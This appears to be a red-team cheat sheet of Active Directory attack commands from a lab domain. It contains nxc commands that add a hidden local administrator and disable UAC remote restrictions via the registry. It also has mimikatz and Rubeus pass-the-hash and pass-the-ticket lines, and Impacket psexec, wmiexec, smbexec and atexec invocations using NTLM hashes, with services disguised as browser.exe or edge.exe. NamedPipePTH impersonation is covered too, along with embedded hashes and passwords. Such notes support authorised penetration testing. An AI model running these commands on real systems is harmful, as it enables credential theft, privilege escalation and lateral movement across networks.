Resources

Commands

  • Recon
    • ActiveDirectory Module
      # Users and the Kerberos encryption types they support (msDS-SupportedEncryptionTypes), plus whether they have an SPN
      Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties SamAccountName, msDS-SupportedEncryptionTypes, ServicePrincipalName | Select-Object SamAccountName, @{Name="EncryptionTypes";Expression={if ($null -eq $_.'msDS-SupportedEncryptionTypes' -or $_.'msDS-SupportedEncryptionTypes' -eq 0) {"Default (Typically AES128/AES256)"} else { $types = @(); if ($_.'msDS-SupportedEncryptionTypes' -band 4) {$types += "RC4_HMAC_MD5"} if ($_.'msDS-SupportedEncryptionTypes' -band 8) {$types += "AES128_HMAC_SHA1"} if ($_.'msDS-SupportedEncryptionTypes' -band 16) {$types += "AES256_HMAC_SHA1"} $types -join ", "}}}, @{Name="HasSPN";Expression={if ($_.ServicePrincipalName) {"Yes"} else {"No"}}} | Format-Table -AutoSize
    • SMB shares
      smbclient -L //192.168.99.32 -U 'REDTEAMRECIPES\fmoheb%70acaa6bad1c4d34405f748f3fa4a9d1' --pw-nt-hash
      
      smbclient \\\\192.168.99.32\\ShareMe -U 'REDTEAMRECIPES\fmoheb%70acaa6bad1c4d34405f748f3fa4a9d1' --pw-nt-hash
      
      impacket-smbclient redteamrecipes.com/fmoheb@192.168.99.32 -hashes :70acaa6bad1c4d34405f748f3fa4a9d1
      
  • Exploit
    • UAC
      • Demo
        nxc smb 192.168.99.32 -u fmoheb -p 'Password123#f' -x 'net user LabAdmin Password123! /add && net localgroup Administrators LabAdmin /add'
         
        nxc smb 192.168.99.32 -u LabAdmin -p 'Password123!' --local-auth -x 'whoami' # Fails while LocalAccountTokenFilterPolicy is unset (UAC remote restrictions)
         
         nxc smb 192.168.99.32 -u fmoheb -p 'Password123#f' -x 'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f'
         
        nxc smb 192.168.99.32 -u LabAdmin -p 'Password123!' --local-auth -x 'whoami' # Succeeds now that LocalAccountTokenFilterPolicy is 1
         
        nxc smb 192.168.99.32 -u fady -p '123' --local-auth -x 'whoami'
         
        nxc smb 192.168.99.32 -u fmoheb -p 'Password123#f' -x 'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /d 1 /f'
         
        nxc smb 192.168.99.32 -u fady -p '123' --local-auth -x 'whoami'
      • Check
        • Powershell
          # Report the two UAC remote-restriction values under the System policy key.
          # A value that is not present is printed as "0 (Default/Missing)", i.e. the default applies.
          $Path = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
          # SilentlyContinue: a missing key gives $null instead of an error, so the
          # null checks below fall through to the default text.
          $Reg = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
           
          [PSCustomObject]@{
              LocalAccountTokenFilterPolicy = if ($null -ne $Reg.LocalAccountTokenFilterPolicy) { $Reg.LocalAccountTokenFilterPolicy } else { "0 (Default/Missing)" }
              FilterAdministratorToken      = if ($null -ne $Reg.FilterAdministratorToken) { $Reg.FilterAdministratorToken } else { "0 (Default/Missing)" }
          } | Format-List
        • cmd
          reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy
          reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken
        • Cleanup
          reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /f
           
          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -Force
    • mimikatz
      mimikatz # sekurlsa::pth /user:robert.baratheon /ntlm:9029CF007326107EB1C519C84EA60DBE /domain:sevenkingdoms.local /run:powershell.exe
    • Rubeus
      Rubeus.exe asktgt /domain:north.sevenkingdoms.local /user:robb.stark /aes256:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a /ptt /opsec /nowrap /outfile:C:\Users\arya.stark\Desktop\robbticket.kirbi
    • nxc
      • smb
        nxc smb 192.168.99.25 -u fmoheb -H aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1
      • winrm
        nxc winrm 192.168.99.10 -u fmoheb -H aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1
      • ldap
        nxc ldap 192.168.99.30 -u fmoheb -H 70acaa6bad1c4d34405f748f3fa4a9d1 -M whoami
    • Impacket
      • Psexec
        python3 psexec.py 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' -dc-ip 192.168.99.10 -service-name browser.exe -remote-binary-name edge.exe
      • Wmiexec
        impacket-wmiexec 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' -dc-ip 192.168.99.10 -shell-type cmd
        # Reference (this URL had been pasted into the middle of the hash above): https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH
      • smbexec
        python3 smbexec.py 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' -dc-ip 192.168.99.10 -service-name edge.exe [-mode SERVER]
      • smbclient
        python3 smbclient.py 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' -dc-ip 192.168.99.10
      • atexec
        python3 atexec.py 'redteamrecipes.com/fmoheb@192.168.99.25' -hashes 'aad3b435b51404eeaad3b435b51404ee:70acaa6bad1c4d34405f748f3fa4a9d1' ipconfig
      • TicketConverter
        base64 -d robbticket.b64 > robbticket.kirbi
        impacket-ticketConverter robbticket.kirbi robbticket.ccache
        export KRB5CCNAME=$(pwd)/robbticket.ccache
         
        impacket-wmiexec -k -no-pass north.sevenkingdoms.local/robb.stark@winterfell.north.sevenkingdoms.local # Use the FQDN, not the IP, when authenticating with the Kerberos ticket
    • NamedPipePTH
      # Only works for local logon, not network logon
       
      Invoke-ImpersonateUser-PTH -Target localhost -domain redteamrecipes.com -Username zazima -Hash c8bb6a952612aa72bb9432a999702f41 -PipeName pth -binary cmd.exe -Verbose
       
      .\SharpNamedPipePTH.exe username:zazima domain:redteamrecipes.com hash:c8bb6a952612aa72bb9432a999702f41 pipename:pth binary:cmd.exe # Did not work in my environment (note: the domain had been misspelled "redteamrecieps.com" here)

Tools

Notes

Nodes